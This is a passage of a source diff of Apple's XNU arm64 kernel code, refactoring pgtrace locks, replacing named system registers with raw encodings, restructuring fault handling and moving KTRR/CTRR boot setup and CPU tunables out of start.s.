lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_enter(q, p, probe_t *, chain); - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); return 0; } @@ -169,15 +157,13 @@ pgtrace_start(void) pgtrace.enabled = 1; - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_add_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } void @@ -188,13 +174,13 @@ pgtrace_stop(void) kprintf("%s\n", __func__); - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_delete_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); pgtrace.enabled = 0; } @@ -229,13 +215,13 @@ pgtrace_set_size(uint32_t size) pgtrace_stop(); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); old_buf = pgtrace.logs; old_size = pgtrace.size; pgtrace.logs = new_buf; pgtrace.size = new_size; pgtrace.rdidx = pgtrace.wridx = 0; - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); if (old_buf) { kfree(old_buf, old_size * sizeof(log_t)); @@ -247,9 +233,9 @@ pgtrace_set_size(uint32_t size) void pgtrace_clear_trace(void) { - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); pgtrace.rdidx = pgtrace.wridx = 0; - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); } boolean_t @@ -304,7 +290,7 @@ pgtrace_write_log(pgtrace_run_result_t res) pgtrace.bytes += sizeof(log); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); pgtrace.logs[RBUF_IDX(pgtrace.wridx, pgtrace.size - 1)] = log; @@ -320,9 +306,7 @@ pgtrace_write_log(pgtrace_run_result_t res) thread_wakeup(pgtrace.logs); } - simple_unlock(&pgtrace.loglock); - - return; + simple_unlock(&pgtrace_loglock); } // pgtrace_read_log() is in user thread @@ -345,13 +329,13 @@ 
pgtrace_read_log(uint8_t *buf, uint32_t size) } ints = ml_set_interrupts_enabled(FALSE); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); // Wait if ring is empty if (pgtrace.rdidx == pgtrace.wridx) { assert_wait(pgtrace.logs, THREAD_ABORTSAFE); - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); ml_set_interrupts_enabled(ints); wr = thread_block(NULL); @@ -360,7 +344,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size) } ints = ml_set_interrupts_enabled(FALSE); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); } // Trim the size @@ -386,7 +370,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size) pgtrace.rdidx += total; - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); ml_set_interrupts_enabled(ints); return total * sizeof(log_t); @@ -412,12 +396,10 @@ static struct { decoder_t *decoder; logger_t *logger; queue_head_t probes; +} pgtrace; - lck_grp_t *lock_grp; - lck_grp_attr_t *lock_grp_attr; - lck_attr_t *lock_attr; - lck_mtx_t probelock; -} pgtrace = {}; +static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock"); +static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp); //------------------------------------ // functions for pmap fault handler @@ -482,12 +464,6 @@ pgtrace_init(decoder_t *decoder, logger_t *logger) return EINVAL; } - pgtrace.lock_attr = lck_attr_alloc_init(); - pgtrace.lock_grp_attr = lck_grp_attr_alloc_init(); - pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr); - - lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr); - queue_init(&pgtrace.probes); pgtrace.decoder = decoder; pgtrace.logger = logger; @@ -517,9 +493,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end) p->pmap = vm_map_pmap(thread->map); } - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_enter(q, p, probe_t *, chain); - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); return 0; } @@ -532,7 
+508,7 @@ pgtrace_clear_probe(void) kprintf("%s\n", __func__); - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); p = (probe_t *)queue_first(q); while (!queue_end(q, (queue_entry_t)p)) { @@ -544,9 +520,7 @@ pgtrace_clear_probe(void) p = next; } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } void @@ -563,15 +537,13 @@ pgtrace_start(void) pgtrace.active = true; - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_add_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } void @@ -582,13 +554,13 @@ pgtrace_stop(void) kprintf("%s\n", __func__); - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_delete_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); pgtrace.active = false; } diff --git a/osfmk/arm64/platform_tests.c b/osfmk/arm64/platform_tests.c index 37eb2dda1..f05b33b2d 100644 --- a/osfmk/arm64/platform_tests.c +++ b/osfmk/arm64/platform_tests.c @@ -1050,6 +1050,7 @@ struct munger_test { {MT_FUNC(munge_wws), 3, 3, {MT_W_VAL, MT_W_VAL, MT_S_VAL}}, {MT_FUNC(munge_wwwsw), 5, 5, {MT_W_VAL, MT_W_VAL, MT_W_VAL, MT_S_VAL, MT_W_VAL}}, {MT_FUNC(munge_llllll), 12, 6, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}}, + {MT_FUNC(munge_llll), 8, 4, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}}, {MT_FUNC(munge_l), 2, 1, {MT_L_VAL}}, {MT_FUNC(munge_lw), 3, 2, {MT_L_VAL, MT_W_VAL}}, {MT_FUNC(munge_lwww), 5, 4, {MT_L_VAL, MT_W_VAL, MT_W_VAL, MT_W_VAL}}, @@ -1183,16 +1184,16 @@ arm64_ropjop_test() if (config_jop_enabled) { /* jop key */ - uint64_t apiakey_hi = __builtin_arm_rsr64(ARM64_REG_APIAKEYHI_EL1); - uint64_t apiakey_lo = __builtin_arm_rsr64(ARM64_REG_APIAKEYLO_EL1); + uint64_t apiakey_hi = __builtin_arm_rsr64("APIAKEYHI_EL1"); + 
uint64_t apiakey_lo = __builtin_arm_rsr64("APIAKEYLO_EL1"); T_EXPECT(apiakey_hi != 0 && apiakey_lo != 0, NULL); } if (config_rop_enabled) { /* rop key */ - uint64_t apibkey_hi = __builtin_arm_rsr64(ARM64_REG_APIBKEYHI_EL1); - uint64_t apibkey_lo = __builtin_arm_rsr64(ARM64_REG_APIBKEYLO_EL1); + uint64_t apibkey_hi = __builtin_arm_rsr64("APIBKEYHI_EL1"); + uint64_t apibkey_lo = __builtin_arm_rsr64("APIBKEYLO_EL1"); T_EXPECT(apibkey_hi != 0 && apibkey_lo != 0, NULL); @@ -1617,13 +1618,13 @@ arm64_spr_lock_test() thread_block(THREAD_CONTINUE_NULL); T_LOG("Running SPR lock test on cpu %d\n", p->cpu_id); - uint64_t orig_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8)); + uint64_t orig_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0)); spr_lock_test_addr = (vm_offset_t)VM_KERNEL_STRIP_PTR(arm64_msr_lock_test); spr_lock_exception_esr = 0; arm64_msr_lock_test(~orig_value); T_EXPECT(spr_lock_exception_esr != 0, "MSR write generated synchronous abort"); - uint64_t new_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8)); + uint64_t new_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0)); T_EXPECT(orig_value == new_value, "MSR write did not succeed"); spr_lock_test_addr = 0; diff --git a/osfmk/arm64/platform_tests_asm.s b/osfmk/arm64/platform_tests_asm.s index 5ec159e48..7b41b5083 100644 --- a/osfmk/arm64/platform_tests_asm.s +++ b/osfmk/arm64/platform_tests_asm.s @@ -34,6 +34,6 @@ .align 2 .globl EXT(arm64_msr_lock_test) LEXT(arm64_msr_lock_test) - msr ARM64_REG_HID8, x0 + msr S3_0_C15_C8_0, x0 ret #endif diff --git a/osfmk/arm64/proc_reg.h b/osfmk/arm64/proc_reg.h index 307027f7c..545142ba4 100644 --- a/osfmk/arm64/proc_reg.h +++ b/osfmk/arm64/proc_reg.h @@ -1378,6 +1378,8 @@ #define ARM_PTE_NX 0x0040000000000000ULL /* value for no execute bit */ #define ARM_PTE_NXMASK 0x0040000000000000ULL /* no execute mask */ +#define ARM_PTE_XMASK (ARM_PTE_PNXMASK | ARM_PTE_NXMASK) + #define ARM_PTE_WIRED 0x0400000000000000ULL /* value for software wired bit */ #define ARM_PTE_WIRED_MASK 
0x0400000000000000ULL /* software wired mask */ @@ -2057,6 +2059,19 @@ b.ne 1f 1: .endmacro +/* + * Wedges CPUs with a specified core that are below a specified revision. This + * macro is intended for CPUs that have been deprecated in iBoot and may have + * incorrect behavior if they continue running xnu. + */ +.macro DEPRECATE_COREEQ_REVLO core, rev, midr_el1, scratch +EXEC_COREEQ_REVLO \core, \rev, \midr_el1, \scratch +/* BEGIN IGNORE CODESTYLE */ +b . +/* END IGNORE CODESTYLE */ +EXEC_END +.endmacro + /* * Sets bits in an SPR register. * arg0: Name of the register to be accessed. diff --git a/osfmk/arm64/sleh.c b/osfmk/arm64/sleh.c index 51bd6a69b..a84e319f8 100644 --- a/osfmk/arm64/sleh.c +++ b/osfmk/arm64/sleh.c @@ -68,6 +68,7 @@ + #ifndef __arm64__ #error Should only be compiling for arm64. #endif @@ -109,6 +110,9 @@ void panic_with_thread_kernel_state(const char *msg, arm_saved_state_t *ss) __ab void sleh_synchronous_sp1(arm_context_t *, uint32_t, vm_offset_t) __abortlike; void sleh_synchronous(arm_context_t *, uint32_t, vm_offset_t); + + + void sleh_irq(arm_saved_state_t *); void sleh_fiq(arm_saved_state_t *); void sleh_serror(arm_context_t *context, uint32_t esr, vm_offset_t far); @@ -324,12 +328,12 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o #if defined(NO_ECORE) uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf; - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS)); - l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS)); - l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR)); - l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0)); + l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0)); + l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0)); + l2c_err_inf = 
__builtin_arm_rsr64(STR(S3_3_C15_C10_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0)); panic_plain("Unhandled " CPU_NAME " implementation specific error. state=%p esr=%#x far=%p\n" @@ -343,13 +347,13 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf, mpidr, migsts; mpidr = __builtin_arm_rsr64("MPIDR_EL1"); - migsts = __builtin_arm_rsr64(STR(ARM64_REG_MIGSTS_EL1)); - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS)); - l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS)); - l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR)); - l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS)); + migsts = __builtin_arm_rsr64(STR(MIGSTS_EL1)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0)); + l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0)); + l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0)); + l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0)); panic_plain("Unhandled " CPU_NAME " implementation specific error. 
state=%p esr=%#x far=%p p-core?%d migsts=%p\n" @@ -361,24 +365,24 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o #else // !defined(NO_ECORE) && !defined(HAS_MIGSTS) uint64_t llc_err_sts, llc_err_adr, llc_err_inf, mpidr; #if defined(HAS_DPC_ERR) - uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_DPC_ERR_STS)); + uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(S3_5_C15_C0_5)); #endif // defined(HAS_DPC_ERR) mpidr = __builtin_arm_rsr64("MPIDR_EL1"); if (mpidr & MPIDR_PNE) { - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0)); } else { - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_MMU_ERR_STS)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_FED_ERR_STS)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C2_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C2_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_2)); } - llc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS)); - llc_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR)); - llc_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF)); + llc_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0)); + llc_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0)); + llc_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0)); panic_plain("Unhandled " CPU_NAME " implementation specific error. 
state=%p esr=%#x far=%p p-core?%d" @@ -555,7 +559,7 @@ __attribute__((__always_inline__)) static inline void task_vtimer_check(thread_t thread) { - if (__improbable(thread->task->vtimers)) { + if (__improbable((thread->task != NULL) && thread->task->vtimers)) { thread->ast |= AST_BSD; thread->machine.CpuDatap->cpu_pending_ast |= AST_BSD; } @@ -893,6 +897,7 @@ handle_uncategorized(arm_saved_state_t *state) */ DebuggerCall(exception, state); + current_thread()->machine.kpcb = NULL; (void) ml_set_interrupts_enabled(interrupt_state); return; } else { @@ -1292,9 +1297,9 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr thread->iotier_override = THROTTLE_LEVEL_NONE; /* Reset IO tier override before handling abort from userspace */ if (is_vm_fault(fault_code)) { - kern_return_t result = KERN_FAILURE; vm_map_t map = thread->map; vm_offset_t vm_fault_addr = fault_addr; + kern_return_t result = KERN_FAILURE; assert(map != kernel_map); @@ -1330,21 +1335,22 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr } } #endif - /* check to see if it is just a pmap ref/modify fault */ - if ((result != KERN_SUCCESS) && !is_translation_fault(fault_code)) { + if (!is_translation_fault(fault_code)) { result = arm_fast_fault(map->pmap, vm_fault_addr, fault_type, (fault_code == FSC_ACCESS_FLAG_FAULT_L3), TRUE); } - if (result != KERN_SUCCESS) { - { - /* We have to fault the page in */ - result = vm_fault(map, vm_fault_addr, fault_type, - /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE, - /* caller_pmap */ NULL, /* caller_pmap_addr */ 0); - } + if (result == KERN_SUCCESS) { + return; + } + + { + /* We have to fault the page in */ + result = vm_fault(map, vm_fault_addr, fault_type, + /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE, + /* caller_pmap */ NULL, /* caller_pmap_addr */ 0); } if (result == KERN_SUCCESS || result == KERN_ABORTED) { return; @@ -1519,7 +1525,15 @@ 
handle_kernel_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_ad interruptible = THREAD_UNINT; } else { map = thread->map; - interruptible = THREAD_ABORTSAFE; + + /** + * In the case that the recovery handler is set (e.g., during copyio + * and dtrace probes), we don't want the vm_fault() operation to be + * aborted early. Those code paths can't handle restarting the + * vm_fault() operation so don't allow it to return early without + * creating the wanted mapping. + */ + interruptible = (recover) ? THREAD_UNINT : THREAD_ABORTSAFE; } #if CONFIG_PGTRACE @@ -1629,10 +1643,11 @@ handle_svc(arm_saved_state_t *state) mach_kauth_cred_uthread_update(); if (trap_no < 0) { - if (trap_no == MACH_ARM_TRAP_ABSTIME) { + switch (trap_no) { + case MACH_ARM_TRAP_ABSTIME: handle_mach_absolute_time_trap(state); return; - } else if (trap_no == MACH_ARM_TRAP_CONTTIME) { + case MACH_ARM_TRAP_CONTTIME: handle_mach_continuous_time_trap(state); return; } @@ -1665,6 +1680,7 @@ handle_mach_continuous_time_trap(arm_saved_state_t *state) saved_state64(state)->x[0] = now; } + __attribute__((noreturn)) static void handle_msr_trap(arm_saved_state_t *state, uint32_t esr) @@ -1780,7 +1796,7 @@ sleh_fiq(arm_saved_state_t *state) uint64_t ipi_sr = 0; if (gFastIPI) { - MRS(ipi_sr, ARM64_REG_IPI_SR); + MRS(ipi_sr, "S3_5_C15_C1_1"); if (ipi_sr & 1) { is_ipi = TRUE; @@ -1802,6 +1818,7 @@ sleh_fiq(arm_saved_state_t *state) sleh_interrupt_handler_prologue(state, type); + #if defined(HAS_IPI) if (is_ipi) { /* @@ -1812,7 +1829,7 @@ sleh_fiq(arm_saved_state_t *state) * IPI to this CPU may be lost. ISB is required to ensure the msr * is retired before execution of cpu_signal_handler(). 
*/ - MSR(ARM64_REG_IPI_SR, ipi_sr); + MSR("S3_5_C15_C1_1", ipi_sr); __builtin_arm_isb(ISB_SY); cpu_signal_handler(); } else @@ -1844,6 +1861,7 @@ sleh_fiq(arm_saved_state_t *state) INTERRUPT_MASKED_DEBUG_END(); } + sleh_interrupt_handler_epilogue(); #if MACH_ASSERT if (preemption_level != get_preemption_level()) { diff --git a/osfmk/arm64/smccc_asm.h b/osfmk/arm64/smccc_asm.h new file mode 100644 index 000000000..1f27d8d8b --- /dev/null +++ b/osfmk/arm64/smccc_asm.h @@ -0,0 +1,60 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _ARM64_SMCCC_ASM_H_ +#define _ARM64_SMCCC_ASM_H_ + +#ifndef __ASSEMBLER__ +#error "This header should only be used in .s files" +#endif + +/* + * SAVE_SMCCC_CLOBBERED_REGISTERS + * + * Saves x0-x3 to stack in preparation for an hvc/smc call. + */ + +.macro SAVE_SMCCC_CLOBBERED_REGISTERS +stp x0, x1, [sp, #- 16]! +stp x2, x3, [sp, #- 16]! +.endmacro + +/* + * LOAD_SMCCC_CLOBBERED_REGISTERS + * + * Loads x0-x3 from stack after an hvc/smc call. + */ + +.macro LOAD_SMCCC_CLOBBERED_REGISTERS +ldp x2, x3, [sp], #16 +ldp x0, x1, [sp], #16 +.endmacro + +#endif /* _ARM64_SMCCC_ASM_H_ */ + +/* vim: set ts=4 ft=asm: */ diff --git a/osfmk/arm64/start.s b/osfmk/arm64/start.s index 10d16d122..5b64fbf5f 100644 --- a/osfmk/arm64/start.s +++ b/osfmk/arm64/start.s @@ -137,48 +137,6 @@ LEXT(reset_vector) #endif -#if defined(KERNEL_INTEGRITY_KTRR) - /* - * Set KTRR registers immediately after wake/resume - * - * During power on reset, XNU stashed the kernel text region range values - * into __DATA,__const which should be protected by AMCC RoRgn at this point. - * Read this data and program/lock KTRR registers accordingly. - * If either values are zero, we're debugging kernel so skip programming KTRR. - */ - - /* refuse to boot if machine_lockdown() hasn't completed */ - adrp x17, EXT(lockdown_done)@page - ldr w17, [x17, EXT(lockdown_done)@pageoff] - cbz w17, . - - // load stashed rorgn_begin - adrp x17, EXT(ctrr_begin)@page - add x17, x17, EXT(ctrr_begin)@pageoff - ldr x17, [x17] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - // if rorgn_begin is zero, we're debugging. skip enabling ktrr - cbz x17, Lskip_ktrr -#else - cbz x17, . -#endif - - // load stashed rorgn_end - adrp x19, EXT(ctrr_end)@page - add x19, x19, EXT(ctrr_end)@pageoff - ldr x19, [x19] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - cbz x19, Lskip_ktrr -#else - cbz x19, . 
-#endif - - msr ARM64_REG_KTRR_LOWER_EL1, x17 - msr ARM64_REG_KTRR_UPPER_EL1, x19 - mov x17, #1 - msr ARM64_REG_KTRR_LOCK_EL1, x17 -Lskip_ktrr: -#endif /* defined(KERNEL_INTEGRITY_KTRR) */ // Process reset handlers adrp x19, EXT(ResetHandlerData)@page // Get address of the reset handler data @@ -203,62 +161,6 @@ Lnext_cpu_data_entry: b.eq Lskip_cpu_reset_handler // Not found b Lcheck_cpu_data_entry // loop Lfound_cpu_data_entry: -#if defined(KERNEL_INTEGRITY_CTRR) - /* - * Program and lock CTRR if this CPU is non-boot cluster master. boot cluster will be locked - * in machine_lockdown. pinst insns protected by VMSA_LOCK - * A_PXN and A_MMUON_WRPROTECT options provides something close to KTRR behavior - */ - - /* refuse to boot if machine_lockdown() hasn't completed */ - adrp x17, EXT(lockdown_done)@page - ldr w17, [x17, EXT(lockdown_done)@pageoff] - cbz w17, . - - // load stashed rorgn_begin - adrp x17, EXT(ctrr_begin)@page - add x17, x17, EXT(ctrr_begin)@pageoff - ldr x17, [x17] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - // if rorgn_begin is zero, we're debugging. skip enabling ctrr - cbz x17, Lskip_ctrr -#else - cbz x17, . -#endif - - // load stashed rorgn_end - adrp x19, EXT(ctrr_end)@page - add x19, x19, EXT(ctrr_end)@pageoff - ldr x19, [x19] -#if DEBUG || DEVELOPMENT || CONFIG_DTRACE - cbz x19, Lskip_ctrr -#else - cbz x19, . -#endif - - mrs x18, ARM64_REG_CTRR_LOCK_EL1 - cbnz x18, Lskip_ctrr /* don't touch if already locked */ - msr ARM64_REG_CTRR_A_LWR_EL1, x17 - msr ARM64_REG_CTRR_A_UPR_EL1, x19 - mov x18, #(CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT) - msr ARM64_REG_CTRR_CTL_EL1, x18 - mov x18, #1 - msr ARM64_REG_CTRR_LOCK_EL1, x18 - - - isb - tlbi vmalle1 - dsb ish - isb -Lspin_ctrr_unlocked: - /* we shouldn't ever be here as cpu start is serialized by cluster in cpu_start(), - * and first core started in cluster is designated cluster master and locks - * both core and cluster. 
subsequent cores in same cluster will run locked from - * from reset vector */ - mrs x18, ARM64_REG_CTRR_LOCK_EL1 - cbz x18, Lspin_ctrr_unlocked -Lskip_ctrr: -#endif adrp x20, EXT(const_boot_args)@page add x20, x20, EXT(const_boot_args)@pageoff ldr x0, [x21, CPU_RESET_HANDLER] // Call CPU reset handler @@ -780,7 +682,7 @@ common_start: #if defined(APPLEHURRICANE) // Increase Snoop reservation in EDB to reduce starvation risk // Needs to be done before MMU is enabled - HID_INSERT_BITS ARM64_REG_HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12 + HID_INSERT_BITS HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12 #endif #if defined(BCM2837) @@ -876,36 +778,26 @@ common_start: #if defined(APPLE_ARM64_ARCH_FAMILY) - // Initialization common to all Apple targets + // Initialization common to all non-virtual Apple targets ARM64_IS_PCORE x15 - ARM64_READ_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4 + ARM64_READ_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0 orr x12, x12, ARM64_REG_HID4_DisDcMVAOps orr x12, x12, ARM64_REG_HID4_DisDcSWL2Ops - ARM64_WRITE_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4 + ARM64_WRITE_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0 #endif // APPLE_ARM64_ARCH_FAMILY // Read MIDR before start of per-SoC tunables mrs x12, MIDR_EL1 -#if defined(APPLELIGHTNING) - // Cebu - -#if defined(APPLETYPHOON) -#include "tunables_h7.s" -#elif defined(APPLETWISTER) -#include "tunables_h8.s" -#elif defined(APPLEHURRICANE) -#include "tunables_h9.s" -#elif defined(APPLEMONSOON) -#include "tunables_h10.s" -#elif defined(APPLEVORTEX) -#include "tunables_h11.s" -#elif defined(APPLELIGHTNING) -#include "tunables_h12.s" -#elif defined(APPLEFIRESTORM) -#include "tunables_h13.s" -#else -.macro APPLY_TUNABLES -.endmacro -#endif diff --git a/osfmk/arm64/tunables/tunables_h10.s b/osfmk/arm64/tunables/tunables_h10.s deleted file mode 100644 index e246200ed..000000000 --- a/osfmk/arm64/tunables/tunables_h10.s +++ 
/dev/null @@ -1,76 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. 
- * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - - // SW WAR/eval: WKdm write ack lost when bif_wke_colorWrAck_XXaH asserts concurrently for both colors - HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_WkeForceStrictOrder, $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_SKYE_MISTRAL, $0, $1 - // : Atomic launch eligibility is erroneously taken away when a store at SMB gets invalidated - HID_CLEAR_BITS ARM64_REG_EHID11, ARM64_REG_EHID11_SmbDrainThresh_mask, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - EXEC_COREEQ_REVLO MIDR_SKYE_MISTRAL, 